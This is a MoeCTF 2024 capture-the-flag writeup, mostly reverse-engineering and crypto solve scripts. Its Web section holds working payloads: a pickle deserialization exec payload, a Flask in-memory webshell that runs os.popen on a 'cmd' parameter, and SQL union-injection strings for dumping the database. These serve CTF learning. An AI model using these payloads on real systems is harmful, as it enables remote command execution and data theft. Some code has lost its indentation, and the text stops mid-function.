MoeCTF2024 Writeup
Week4
Reverse
moejvav
```
// Instrumented copy of the challenge's dispatch loop, taken from decompiler output: the
// array literal is abbreviated with "+210 more", so this listing is not compilable as shown.
// Each instruction word is used as an index into exceptions2; throwing that exception and
// catching it by type is how the VM selects a handler. The print statements log every
// operation and the value each comparison expects.
vmInsn = [0, 1, 60, 2, -20, 6, -25, 0, 1, 60, 2, -20, 6, -27, 0, 1, 60, 2, -20, 6, -33, 0, 1, 60, 2, -20, 6, -31, 0, 1, 60, 2, -20, 6, -50, 0, 1, 60, 2, -20, 6, -36, 0, 1, 60, 2, -20, 6, -39, 0, 1, 60, 2, -20, 6, -24, 0, 1, 60, 2, -20, 6, -52, 0, 1, 60, 2, -20, 6, -29, 0, 1, 60, 2, -20, 6, -52, 0, 1, 14, 2, 5, 6, -64, 0, 1, 14, 2, 5, 6, -58, 0, 1, 14, 2, 5, 6, -63, 0, 1, +210 more]
// Opcode table: indices 0..7 are the custom exception types in this order; index 8 is a
// plain RuntimeException, which only the generic catch at the bottom handles.
Exception[] exceptions2 = {new BuDaoLePaoException(), new DxIsNanTongException(), new GenshinImpactException(), new LuoIsNotDogException(), new NotSigninException(), new NullCafeException(), new StarrySkyMeowNotFoundException(), new TokioEatWhatException(), new RuntimeException()};
// i is the instruction pointer into vmInsn; store is the single accumulator.
int i = 0;
int store = 0;
while (i < vmInsn.length) {
int insn = vmInsn[i];
i++;
// 114514 is the halt marker: leave the loop and fall through to the success message.
if (insn == 114514) {
break;
}
try {
// Dispatch: the thrown exception's type picks the catch block below.
throw exceptions2[insn];
// break;
} catch (BuDaoLePaoException e) {
// Opcode 0: load the next input byte into the accumulator and consume it.
// `array` is declared outside this excerpt; presumably the flag bytes under test.
store = array.get(0).byteValue();
array.remove(0);
} catch (DxIsNanTongException e2) {
// Opcode 1: XOR the accumulator with the inline operand, then skip the operand.
store ^= vmInsn[i];
System.out.print(" ^" + String.valueOf(vmInsn[i]));
i++;
} catch (GenshinImpactException e3) {
// Opcode 2: add the inline operand (the operand may be negative, e.g. -20).
store += vmInsn[i];
System.out.print(" +" + String.valueOf(vmInsn[i]));
i++;
} catch (LuoIsNotDogException e4) {
// Opcode 3: bitwise AND with the inline operand.
store &= vmInsn[i];
System.out.print(" &" + String.valueOf(vmInsn[i]));
i++;
} catch (NotSigninException e5) {
// Opcode 4: shift the accumulator left by the inline operand.
store <<= vmInsn[i];
System.out.print(" << " + String.valueOf(vmInsn[i]));
i++;
} catch (NullCafeException e6) {
// Opcode 5: bitwise OR with the inline operand.
store |= vmInsn[i];
System.out.println(" | " + String.valueOf(vmInsn[i]));
i++;
} catch (StarrySkyMeowNotFoundException e7) {
// Opcode 6: comparison. The instrumented version only prints the expected value
// (the operand) and skips it, so execution continues whatever the input was.
System.out.println(" flag[i] shoud be " + String.valueOf(vmInsn[i]));
i++;
// The commented-out lines below appear to be the original check: on a mismatch
// the next slot was overwritten with opcode 7.
// if (store != vmInsn[i]) {
// vmInsn[i] = 7;
// System.out.println("vmInsn[i]=7" );
// }
} catch (TokioEatWhatException e8) {
// Opcode 7: overwrite the next slot with 8. i is not advanced, so the next fetch
// reads 8, throws the RuntimeException and lands in the failure handler below.
vmInsn[i] = 8;
System.out.println("vmInsn[i]=8" );
} catch (Exception e9) {
// Anything else (opcode 8, or an index outside exceptions2) is reported as a wrong flag.
System.out.println("wrong flag, oh no...");
throw new RuntimeException(e9);
}
}
// Reached only through the halt marker or by running off the end of vmInsn.
System.out.println("输入的flag正确!");
}
```
4组数据.
第1组 (x ^ 60) - 20 (vmInsn 中对应的加数是 -20, 所以解密时先 +20 再 ^60)
第2组 (x ^ 14) + 5
第3组 (x ^ 10) + 5
第4组 (x + 14) + 10
求解..
def dec1(x):
    """Invert group 1: add 20 back (the VM adds -20), then undo the XOR with 60."""
    shifted = x + 20
    return shifted ^ 60


def dec2(x):
    """Invert group 2, ``(x ^ 14) + 5``."""
    shifted = x - 5
    return shifted ^ 14


def dec3(x):
    """Invert group 3, ``(x ^ 10) + 5``."""
    shifted = x - 5
    return shifted ^ 10


def dec4(x):
    """Invert group 4, ``(x + 14) + 10``."""
    return x - 10 - 14


def decode(x):
    """Undo the outer transform ``(b2.byteValue() ^ 202) + 32`` and keep the low byte."""
    return ((x - 32) ^ 202) & 0xff


# Expected comparison values logged by the instrumented VM, one list per group.
lst1 = [-25, -27, -33, -31, -50, -36, -39, -24, -52, -29, -52]
lst2 = [-64, -58, -63, -52, -90, -39, -43, 26, 25, -49, -64]
lst3 = [-51, 25, -45, -55, -47, 24, -41, -60, 22, -40, -60]
lst4 = [-15, 50, -51, -31, 50, 50, -35, 50, -35, 51, -17]

# Each value goes through its group's inverse first, then the shared outer inverse.
t1 = list(map(chr, map(decode, map(dec1, lst1))))
t2 = list(map(chr, map(decode, map(dec2, lst2))))
t3 = list(map(chr, map(decode, map(dec3, lst3))))
t4 = list(map(chr, map(decode, map(dec4, lst4))))
print(''.join([*t1, *t2, *t3, *t4]))
# moectf{jvav_eXcEpt10n_h4ndl3r_1s_s0_c00o0o1}
sm4
key为 thekeytosomethin 输入时会覆盖首位t
from sm4 import SM4Key
# Ciphertext bytes, written as hex.
ciphertext_hex = "AD6CCDC109FCDDEF83AE9308538EC5375CDD1B4B039919A26924964277C1275F2DD45DF52BB032F7A597C68AEE48AE93"
m = bytes.fromhex(ciphertext_hex)
# 16-byte key: "thekeytosomethin" with its first byte replaced by 0x00, following the
# note that the program's input handling overwrites the leading 't'.
key = b'\x00' + b'hekeytosomethin'
key0 = SM4Key(key)
r = key0.decrypt(m)
print(r)
d0tN3t
# Check in the binary: ((byte)((int)((byte)text[i] + 114 ^ 114) ^ i * i) != array[i])
# Inverse per byte: XOR with i*i, XOR with 114, subtract 114, keep the low 8 bits.
array = [
    173, 146, 161, 174, 132, 179, 187, 234, 231, 244, 177, 161, 65, 13, 18, 12,
    166, 247, 229, 207, 125, 109, 67, 180, 230, 156, 125, 127, 182, 236, 105, 21,
    215, 148, 92, 18, 199, 137, 124, 38, 228, 55, 62, 164,
]
for i, c in enumerate(array):
    d = (c ^ (i * i) ^ 114) - 114
    # i*i exceeds one byte for larger i; the mask discards those high bits.
    print(chr(d & 0xff), end='')
Week3
Crypto
EzMatrix
EzPack
One more bit
Misc
Done | ctfer2077②
核心价值观 p@55w0rd
verycrypt挂载
ntfs流解出 小鹤.txt
ulpb vfde hfyz yisi buuima
key jqui xxmm vedrhx de qrpb xnxp
ulpb ui veyh dazide
小鹤 是双拼。用双拼输出
双拼 真的 很有 意思 不是吗
key 就是 下面 这段话 的 全拼 小写
双拼 是 这样 打字的
shuangpinshizheyangdazide
moectf{shuangpinshizheyangdazide}
Done | ez_Forensics
直接搜 moectf
moectf{WWBGY-TLVC5-XKYBZ}
Done | 我的图层在你之上
black文件末尾有 https://ps.gaoding.com/#/
将文件放进入发现多个图层
把黑色导出。stegsolve 看找到 p_w_d
解压得到凯撒 zbrpgs{q751894o-rr0n-47qq-85q4-r92q0443921s}
rot13 bruteforce moectf{d751894b-ee0a-47dd-85d4-e92d0443921f}
拼图羔手
拼图
balabalbalablbalblablbalabala//nihaopintugaoshou//encoded_flag{71517ysd%ryxsc!usv@ucywqosyqxl&sxl*sbys^wb\(syqwp\)ysyw!qpw@hs}
解一下encode.py 得到 # key: StrangeCharacterStaywithNumberOnSomewhere
import base64
from base64 import b64encode as be
def self_decoding(input_text):
    """Reverse the letter substitution applied by ``self_encoding``.

    Letters are mapped back through a translation table. Digits are not decoded:
    the forward digit routine ``enc_number`` is simply re-run on ``input_text``
    and its output is appended.

    The cipher alphabet contains 'Q' twice and no 'W' (``self_encoding`` sends
    both 'W' and 'Z' to 'Q'), so ``str.maketrans`` keeps the later pair and 'Q'
    always decodes to 'Z'.

    Returns a list of characters.
    """
    number_setting = "0123456789"
    plain_alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    cipher_alphabet = 'tuvwxyzsrqponmlkjihabcdefgHIJKLMNABCDEFGXYZVUTSRQOPQ'
    table = str.maketrans(cipher_alphabet, plain_alphabet)
    out = list(input_text.translate(table))
    return enc_number(out, input_text, number_setting)
def enc_number(encoded_text, input_text, number_setting):
    """Append the digit encoding of ``input_text`` to ``encoded_text``.

    For every character of ``input_text`` found in ``number_setting``: if it is
    not the last character, append its XOR with the next character (both parsed
    as ints) followed by a space; if it is the last character, append it as is.
    ``int()`` raises ValueError when a digit is followed by a non-digit.

    ``encoded_text`` may be a str or a list; a list is extended in place.
    The nesting assumes the ``elif`` belongs to the inner ``if`` (the page's
    indentation was lost).
    """
    last = len(input_text) - 1
    for pos, ch in enumerate(input_text):
        if ch not in number_setting:
            continue
        if pos != last:
            encoded_text += str(int(ch) ^ int(input_text[pos + 1])) + " "
        else:
            encoded_text += input_text[-1]
    return encoded_text
def self_encoding(input_text):
    """Encode ``input_text`` with the challenge's letter and digit scheme.

    The result starts with one space. Each letter is replaced by its substitute
    followed by a space; characters that are neither letters nor digits are
    copied unchanged; digits are skipped in the first pass and appended
    afterwards as XORs of neighbouring digits (the last digit is copied).
    Both 'W' and 'Z' map to 'Q', so the uppercase mapping is not invertible.
    """
    code_setting_first = "doanythigfruebcjklmqpswvxz"
    code_setting_sec = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    number_setting = "0123456789"

    pieces = [" "]
    for ch in input_text:
        if ch in code_setting_first:
            code = ord(ch)
            if code < 104:          # a-g shift up
                code += 19
            elif code > 115:        # t-z shift down
                code -= 19
            else:                   # h-s are mirrored
                code = 219 - code
            pieces.append(chr(code) + " ")
        elif ch in code_setting_sec:
            code = ord(ch)
            if code <= 71:          # A-G
                code += 7
            elif code <= 78:        # H-N
                code -= 7
            elif code <= 81:        # O-Q
                code += 9
            elif code <= 87:        # R-W are mirrored
                code = 168 - code
            else:                   # X-Z
                code -= 9
            pieces.append(chr(code) + " ")
        elif ch not in number_setting:
            pieces.append(ch)
    encoded_text = "".join(pieces)

    # Second pass: digits only, same rule as enc_number.
    last = len(input_text) - 1
    for pos, ch in enumerate(input_text):
        if ch not in number_setting:
            continue
        if pos != last:
            encoded_text += str(int(ch) ^ int(input_text[pos + 1])) + " "
        else:
            encoded_text += input_text[-1]
    return encoded_text
def reverse_encoding(input_text):
    """Return ``input_text`` reversed; works for any sliceable sequence (str, bytes)."""
    return input_text[::-1]
def strange_character_hint(key):
    """Print the base64 of ``key`` after reversing, encoding and removing spaces."""
    encoded = self_encoding(reverse_encoding(key))
    res = encoded.replace(" ", "")
    print(be(res.encode('utf-8')))
"""enjoy the revenge!"""
if __name__ == "__main__":
    # Hint blob from the challenge: base64 of the reversed, encoded key.
    cip = b'eGl4c2R4bmxVbVhpeHVuYkdzYXJkZnRhVWl4YXZ0aXRzSnh6bXRpYVU='
    # Undo the steps in reverse order: base64, then the reversal, then the substitution.
    reversed_text = reverse_encoding(base64.b64decode(cip)).decode()
    print(''.join(self_decoding(reversed_text)))
# key: StrangeCharacterStaywithNumberOnSomewhere
Done|时光穿梭机
moectf{han_fang_tang}
辣鸡,不要看地图名字,看图片招牌
Han-yi, Feng. ‘Discovery and Excavation of the Royal Tomb of Wang Chien’. Quarterly Bulletin of Chinese Bibliography. N.S. 4 (1944), 1–11 Google Scholar. Te-k'un, Cheng. ‘Royal Tomb of Wang Chien’. H.J.A.S. 8 (1945), 235–41Google Scholar. Michael Sullivan, D.. ‘Excavation of a T'ang Imperial Tomb’. Illus. London News, April 20, 1946 Google Scholar.
pwn
NX_on!
Pwn_it_off!
Read_once_twice!
shellcode_revenge
Where is fmt?
Reverse
Done | Just-Run-It
>0x0.exe
moectf2024@xdsec ~> cat /flag.0
6257396c5933526d657a55355a6d45
└─$ ./0x1.elf
moectf2024@xdsec ~> cat /flag.1
324d444a6a4c5459794e4745744e44
--- 0x2运行结果 SDK 34以上运行
adb: failed to install 0x2.APK: Failure [INSTALL_FAILED_OLDER_SDK: Requires newer sdk version #34 (current version is #31)]
Hello moectf2024!moectf2024@xdsec ~>
cat /flag.2
42694e7930345954566a4c57557a4e
└─$ qemu-riscv64-static 0x3.riscv64.elf
[87, 85, 49, 78, 122, 82, 106, 90, 106, 108, 105, 79, 88, 48, 61]
# bW9lY3RmezU5ZmE2MDJjLTYyNGEtNDBiNy04YTVjLWUzNWU1NzRjZjliOX0=
# moectf{59fa602c-624a-40b7-8a5c-e35e574cf9b9}
Done | rc4
A71A68ECD82711CC8C9B16155CD2673E82ADCE75D4BC5756C28A52B86BD6CCF8A4BA722FE05715B92411
RC4_1s_4w3s0m3
moectf{why_Rc4_haS_The_Rev32sabl3_pr0ceSS}
Done | xor(大嘘)
call $+5 花指令 nop掉
加密流程 Str ^ kvCode -> tea -> ^ v9 == byte_DD4058
解密流程 byte_DD4058 ^ v9 -> decode tea -> ^kvcode
# Crypto_tea_tea.py
# 如果超过8字节 2个一组处理
from Crypto.Util.number import long_to_bytes
def decrypt(v, k):
    """Decrypt one 64-bit TEA block.

    ``v`` holds two 32-bit words and ``k`` four 32-bit key words. Runs 32 rounds
    with delta 0x9E3779B9 and returns the two plaintext words as a list.
    """
    mask = 0xFFFFFFFF
    delta = 0x9E3779B9
    left, right = v
    k0, k1, k2, k3 = k
    # Start from the sum the encryptor ends on (delta * 32, truncated to 32 bits).
    total = (delta * 32) & mask
    for _ in range(32):
        right = (right - (((left << 4) + k2) ^ (left + total) ^ ((left >> 5) + k3))) & mask
        left = (left - (((right << 4) + k0) ^ (right + total) ^ ((right >> 5) + k1))) & mask
        total = (total - delta) & mask
    return [left, right]
def step1_xor():
    """Return the stored ciphertext (byte_DD4058) XORed byte-wise with the v9 mask."""
    stored = bytes.fromhex('3C0D051F306E1E30043C125259036D5204040B331F33173B171A2B0755045B5A')
    mask = bytes.fromhex('2BF2824148749DAA7E4CDA04082CA8529777B73B162DD4FC60BEC4B673199487')
    return [left ^ right for left, right in zip(stored, mask)]
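def swap_endian(data):
    """Split ``data`` into little-endian 32-bit words.

    ``data`` is a sequence of byte values or a bytes-like object. It is copied,
    zero-padded to a multiple of four bytes and returned as a list of unsigned
    ints. Empty input yields an empty list (the original indexed ``data[0]``
    unconditionally and raised IndexError).
    """
    import struct

    if not data:
        return []
    if isinstance(data[0], int):
        # Copy, so that padding never touches the caller's object.
        data = bytearray(data)
    remainder = len(data) % 4
    if remainder:
        data += b'\x00' * (4 - remainder)
    return [word for (word,) in struct.iter_unpack('<I', data)]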
def step2_tea(values):
    """TEA-decrypt ``values`` two words at a time and return the result as bytes.

    Each pair of 32-bit words is one block; the decrypted words are packed
    little-endian and concatenated.
    """
    from Crypto_tea_tea import decrypt
    import struct

    key = [0x6C6C6568, 0x6F6D5F6F, 0x66746365, 0x34323032]
    result = b''
    for start in range(0, len(values), 2):
        a, b = decrypt(values[start:start + 2], key)
        result += struct.pack('<I', a) + struct.pack('<I', b)
    return result
def step3_xor(lst):
    """XOR ``lst`` with the 16-byte kvCode key repeated twice.

    At most 32 values are produced, because ``zip`` stops at the shorter input.
    """
    xor = bytes.fromhex('68656C6C6F5F6D6F6563746632303234')
    keystream = xor + xor
    return [value ^ mask for value, mask in zip(lst, keystream)]
# Decryption pipeline: strip the v9 mask, regroup into little-endian words,
# TEA-decrypt, then strip the kvCode XOR.
r3 = step3_xor(step2_tea(swap_endian(step1_xor())))
print(bytearray(r3))
# moectf{how_an_easy_junk_and_tea}
Done | xxtea
import xxtea
# Ciphertext taken from the binary.
enc = bytes.fromhex('64F5E178E1F035A834FF1205FB13E9B050A3B989B1DA43C94FC8DB0120DB16AFED671796')
# Force the key to exactly 16 bytes: zero-pad on the right, then truncate.
key = bytes.fromhex('6D6F65637466323032342121BBBBFFCC').ljust(16, b'\x00')[:16]
print(xxtea.decrypt(enc, key, padding=False))
Done | xtea
def decrypt(rounds, v, k):
    """Decrypt one XTEA-style block with the challenge's delta of -0x33004445.

    ``v`` holds two 32-bit words and ``k`` four key words; returns the two
    decrypted words as a list. All arithmetic is truncated to 32 bits.
    """
    mask = 0xFFFFFFFF
    delta = -0x33004445
    lo, hi = v[0], v[1]
    total = (delta * rounds) & mask
    for _ in range(rounds):
        hi = (hi - ((((lo << 4) ^ (lo >> 5)) + lo) ^ (total + k[(total >> 11) & 3]))) & mask
        total = (total - delta) & mask
        lo = (lo - ((((hi << 4) ^ (hi >> 5)) + hi) ^ (total + k[total & 3]))) & mask
    return [lo, hi]
if __name__ == '__main__':
    # byte_7FF715F72000 = A3699626BD780B3D9DA52862
    # lst = [0x269669A3, 0x3D0B78BD, 0x6228A59D]
    # The program encrypts the first two 4-byte words, then the last two;
    # decrypting therefore runs in the opposite order.
    key = [2, 0, 2, 4]
    rounds = 32

    tail = decrypt(rounds, [0x3D0B78BD, 0x6228A59D], key)
    print([hex(word) for word in tail])

    # The middle word is shared by both blocks: feed back its decrypted value.
    head = decrypt(rounds, [0x269669A3, tail[0]], key)
    print([hex(word) for word in head])
"""
['0x60c0d6e0', '0x21213432']
['0x63656f6d', '0x30326674']
0x63656f6d 0x30326674 0x21213432
"""
moectf{moectf2024!!}
Web
Done|who's blog
/?id={{}}
/console
import os
os.environ
Done|PetStore
python反序列化内存马
gASVcAAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIxUaW1wb3J0IG9zO2dsb2JhbCBzdG9yZTtraz1zdHIob3MuZW52aXJvbik7cGV0ID0gUGV0KGtrLCAnc3MnKTtzdG9yZS5wZXRzLmFwcGVuZChwZXQplIWUUpQu
import pickle
import os
import base64
# Challenge payload object, kept as published. pickle stores the (callable, args) pair
# returned by __reduce__, and whoever unpickles the blob calls that callable. This is why
# pickle.loads must never be given bytes that come from a client.
# Hardening for the receiving side: exchange data in a non-executable format such as JSON,
# or authenticate blobs with an HMAC before unpickling; an Unpickler subclass whose
# find_class only allows known-safe classes is a further restriction.
# Detection: the reference to builtins.exec is visible in the serialized stream and can be
# listed with pickletools.dis without executing anything.
class A(object):
def __reduce__(self):
return (exec, ("import os;global store;kk=str(os.environ);pet = Pet(kk, 'ss');store.pets.append(pet)",))
a = A()
pickle_a = pickle.dumps(a)# serialize
print(pickle_a)
# pickle.loads(pickle_a) # deserialising is the step that triggers the code execution
# The challenge endpoint expects the pickle as base64 text.
print(base64.b64encode(pickle_a))
"""
内存马: 需要执行2次 ,先执行下面的
return (exec, ("__import__('sys').modules['__main__'].__dict__['app'].view_functions.update({'shell': lambda:__import__('os').popen(__import__('sys').modules['__main__'].__dict__['app'].request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')).read()})",))
# return (eval, ("__import__('sys').modules['__main__'].__dict__['app'].url_map.add(app.url_rule_class('/flask-shell', methods=['GET'],endpoint='shell'))",))
"""
'''
方法三:写入static文件
cmd = "mkdir static;env>>static/666.txt" # 访问http://127.0.0.1:4433/static/666.txt
'''
Done|smbms
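辣鸡提示:放轻松,想要 sql 注入?PrepareStatement 是不会让你们轻易得逞的。(但下面的 union 注入仍然成功,说明 queryName 很可能是被直接拼接进 SQL 字符串的;PreparedStatement 只有在所有用户输入都通过 ? 占位符绑定时才能防止注入。)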
666' union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,'9527
666' union select 1,(select group_concat(table_name) from information_schema.tables),3,4,5,6,7,8,9,10,11,12,13,'9527
666' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),3,4,5,6,7,8,9,10,11,12,13,'9527
666' union select 1,(select flag from flag),3,4,5,6,7,8,9,10,11,12,13,'9527
GET /jsp/user.do?method=query&queryName=666'%20%20union%20select%201%2c(select%20flag%20from%20flag)%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c'9527&queryUserRole=0&pageIndex=1 HTTP/1.1
Host: 127.0.0.1:3248
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:3248/jsp/user.do?method=query&queryName=666%27++union+select+1%2C%28group_concat%28table_name%29+from+information_schema.tables%29%2C9527%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C%27r&queryUserRole=0&pageIndex=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: verify=user; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30; __wzd30287248c4b7b7137545=1724401549|03b8e06b5b8f; token=06338259-449b-4f70-863b-20c67e647c72; JSESSIONID=D97CDA83C5541A111C6FD777B794BA90
Connection: close
Week2
reverse
[Week1] 逆向工程入门指北
# Encoded bytes from the binary; every byte is XORed with 22. The final 22 decodes
# to a NUL terminator.
lst = [
    123, 121, 115, 117, 98, 112, 109, 100, 37, 96, 37, 100, 101, 37, 73, 39,
    101, 73, 119, 73, 122, 121, 120, 113, 73, 122, 121, 120, 113, 73, 97, 119,
    111, 73, 98, 121, 73, 115, 110, 102, 122, 121, 100, 115, 107, 22,
]
print(''.join(chr(value ^ 22) for value in lst), end='')
# moectf{r3v3rs3_1s_a_long_long_way_to_explore}
[Week1] xor
494B414750425F411C164610131C40094216461C091010421D09461514140917161441404016144712401459000000000000000000000000
Cyberchef
moectf{e82b478d-f2b8-44f9-b100-320edd20c6d0}
[Week1] upx
upx 4.24 解压 得flag
moectf{ec5390dd-f8cf-4b02-bc29-3bb0c5604c29}
[Week1] upx-revenge.exe
UPX变形,010将 vmp替换为UPX. upx -d file.exe
ida一看得到flag
moectf{554ea35c-a1bb-4d8f-a323-bd697564bf27}
secretmodule
customize.sh 用Cyberchef解下。得到
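# Probe for a volume-key press: read one input event and keep only VOLUME ... DOWN lines
# in $MODPATH/events. Returns 0 when such a line was captured, 1 otherwise.
testk() {
  echo "Welcome to the Secret module!But before you begin,you need to prove your self."
  # $MODPATH is quoted so that a path containing spaces is not split into several words.
  (/system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > "$MODPATH/events") || return 1
  return 0
}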
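# Wait for one volume-key press and print "114514" for volume up, "1919810" otherwise.
choose() {
  while true; do
    /system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > "$MODPATH/events"
    # Test grep's exit status directly; the original wrapped the same pipeline in
    # backticks inside a subshell, which yields the same status.
    if /system/bin/grep VOLUME "$MODPATH/events" >/dev/null 2>&1; then
      break
    fi
  done
  if /system/bin/grep VOLUMEUP "$MODPATH/events" >/dev/null 2>&1; then
    echo "114514"
  else
    echo "1919810"
  fi
}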
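# Gate: the device must deliver volume-key events at all.
if testk; then
  ui_print "Great! Now enter the secret."
else
  ui_print "Legacy Device. Use a newer device to do this challenge"
  exit
fi

# Collect seven key presses; each contributes "114514" or "1919810".
concatenated=""
for i in 1 2 3 4 5 6 7
do
  result=$(choose)
  concatenated="${concatenated}${result}"
done

# Compare the MD5 of the concatenation with the stored digest. Only 2^7 inputs are
# possible, so the digest does not protect the secret against offline enumeration.
input_str=$(printf '%s' "$concatenated" | md5sum | awk '{print $1}')
sec="77a58d62b2c0870132bfe8e8ea3ad7f1"
# Quoted operands keep `test` well-formed even if a value is empty.
if test "$input_str" = "$sec"
then
  echo 'You are right!Flag is'
  echo "moectf{$concatenated}"
else
  echo 'Wrong. Try again.'
  exit
fi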
循环7次 按音量上就输出 "114514" 否则 输出 "1919810"
最终md5为 77a58d62b2c0870132bfe8e8ea3ad7f1 爆破即可。
from itertools import product
import hashlib
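# Target digest taken from customize.sh.
sec = "77a58d62b2c0870132bfe8e8ea3ad7f1"
# The two strings a key press can contribute (volume up / anything else).
tp = "114514", "1919810"
# Seven presses give only 2**7 candidates, so exhaustive search is immediate.
for x in product(tp, repeat=7):
    s = "".join(x)
    if hashlib.md5(s.encode()).hexdigest() == sec:
        print(s)
        # Stop with `break`: exit() is a helper installed by the site module and
        # would also terminate any interpreter that imports this snippet.
        break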
moectf{114514114514191981011451411451419198101919810}
逆向工程进阶之北
// 0xccffbbbb 的模反元素 0x8d61d173
// import gmpy2 ; print(hex(gmpy2.invert(0xccffbbbb, 0xffffffff + 1)))
#include <iostream>
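// Recover the flag: undo the XOR, the subtraction and the multiplication applied to
// each 32-bit word, then print the words' bytes in memory order.
int main() {
    // Ciphertext words taken from the binary.
    unsigned int a[] = {0xb5073388, 0xf58ea46f, 0x8cd2d760, 0x7fc56cda, 0x52bc07da, 0x29054b48, 0x42d74750, 0x11297e95,
                        0x5cf2821b, 0x747970da, 0x64793c81};
    for (unsigned int &word : a) {
        // Multiplying by 0x8D61D173 (the stated inverse of 0xccffbbbb) undoes the original
        // multiplication; unsigned arithmetic wraps modulo 2^32 when unsigned int is 32 bits.
        word = ((word ^ (0xd3906 + 0xdeadbeef)) - 0xdeadc0de) * 0x8D61D173;
    }
    // Byte view of the words; the size comes from sizeof instead of a hard-coded 44.
    const unsigned char *bytes = reinterpret_cast<const unsigned char *>(a);
    for (unsigned int k = 0; k < sizeof(a); k++) {
        // std::cout replaces printf, which was called without including <cstdio>.
        std::cout << bytes[k];
    }
    std::cout << std::endl;
    return 0;
}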
moectf{c5f44c32-cbb9-444e-aef4-c0fa7c7a6b7a}
dynamic
...
v9[47] = 0xD1;
key[0] = 0xCAFEBABE;
key[1] = 0xDEADC0DE;
key[2] = 0xD3906;
key[3] = 0x114514;
tea((__int64)v9, 0xFFFFFFF4i64, (__int64)key);
vprintf("What happened to my Flag?\n", v5);
tea((__int64)v9, 12i64, (__int64)key);
vprintf("Your Flag has REencrypted.", v6);
第一次tea加密的返回处断下查看v9内存值得到flag
moectf{18d4c944-947c-4808-9536-c7d34d6b3827}
moeprotector
titan 隐藏.手动处理异常改跳转. 一步一步分析还原算法
enc = bytes.fromhex('C7C4C9CEC2D18B666B8DB045F984FFB251ABB34C33A8610EC53B5BF911828B8E7A23687A211F8791468D90A4A5E035D9414E44F137AF263A8F')
def step1_encrypt(n, lst):
    """Encode each value as ``((c ^ (index + n)) + 20) & 0xff`` and return the list."""
    return [((c ^ (i + n)) + 20) & 0xff for i, c in enumerate(lst)]
def step1(n):
    """Invert ``step1_encrypt`` over the module-level ``enc`` bytes for offset ``n``."""
    return [((c - 20) ^ (i + n)) & 0xff for i, c in enumerate(enc)]
def step2_encrypt(Str, k1):
    """Encrypt the first 56 values of ``Str`` in groups of four.

    Each value becomes ``((index + key) ^ value) + 0x14`` with no masking, so a
    result may exceed 255. A str is encoded to a list of byte values first; a
    list is modified in place and returned. Every group is printed as
    characters for debugging.
    """
    if isinstance(Str, str):
        Str = list(Str.encode())
    for base in range(0, 56, 4):
        block = Str[base:base + 4]
        mixed = [
            ((base + offset + key) ^ value) + 0x14
            for offset, (key, value) in enumerate(zip(k1, block))
        ]
        print([chr(x) for x in mixed])
        Str[base:base + 4] = mixed
    # print(bytes(Str).hex().upper())
    return Str
def pad(Str):
    """Return ``Str`` extended with zeros to a multiple of four items."""
    leftover = len(Str) % 4
    if leftover == 0:
        return Str
    return Str + [0] * (4 - leftover)
def step2_decrypt(Str, k1):
if isinstance(Str, str):
Str = list(Str.encode())
# print(bytes(Str).hex().upper())
for i in range(0, 57, 4):
seq = [i, i + 1, i + 2, i + 3]
key_const = [0x14, 0x14, 0x14, 0x14]
chars = Str[i:i + 4]
xor2 = [(a - b) & 0xff for a, b in zip(chars, key_const)]
sum1 = [(a + b) & 0xff for a, b in zip(seq, k1)]
txt = [(a ^ b) & 0xff for a, b in zip(xor2, sum1)]
Str[i:i + 4] = txt
return Str
# Per-layer key bytes; the layers are undone in the order k3, k2, k1.
k1 = [0x15, 0x15, 0x15, 0x15]
k2 = [0x1A, 0x1A, 0x1A, 0x1A]
k3 = [0x19, 0x19, 0x19, 0x19]

text = list(enc)
for layer_key in (k3, k2, k1):
    # step2_decrypt also walks index 56, which step2_encrypt's range never covers.
    # Applying the forward step to that byte first makes the decrypt pass cancel out.
    text[56] = (text[56] ^ (56 + layer_key[0])) + 20
    text = step2_decrypt(text, layer_key)
print(bytes(text))
moedaily
tea加密.每组需要解2次.
from Crypto.Util.number import long_to_bytes
def encrypt(v, k):
    """Encrypt one 64-bit block with standard TEA (32 rounds, delta 0x9E3779B9).

    ``v`` holds two 32-bit words and ``k`` four key words; returns the two
    ciphertext words as a list.
    """
    mask = 0xFFFFFFFF
    delta = 0x9E3779B9
    left, right = v
    k0, k1, k2, k3 = k
    total = 0
    for _ in range(32):
        total = (total + delta) & mask
        left = (left + (((right << 4) + k0) ^ (right + total) ^ ((right >> 5) + k1))) & mask
        right = (right + (((left << 4) + k2) ^ (left + total) ^ ((left >> 5) + k3))) & mask
    return [left, right]
def decrypt(v, k):
    """Decrypt one TEA block using the challenge's non-standard delta of 114514.

    ``v`` holds two 32-bit words and ``k`` four key words; 32 rounds are run
    and the two decrypted words are returned as a list.
    """
    mask = 0xFFFFFFFF
    delta = 114514
    rounds = 32
    left, right = v
    k0, k1, k2, k3 = k
    # Equivalent to summing delta once per round, truncated to 32 bits.
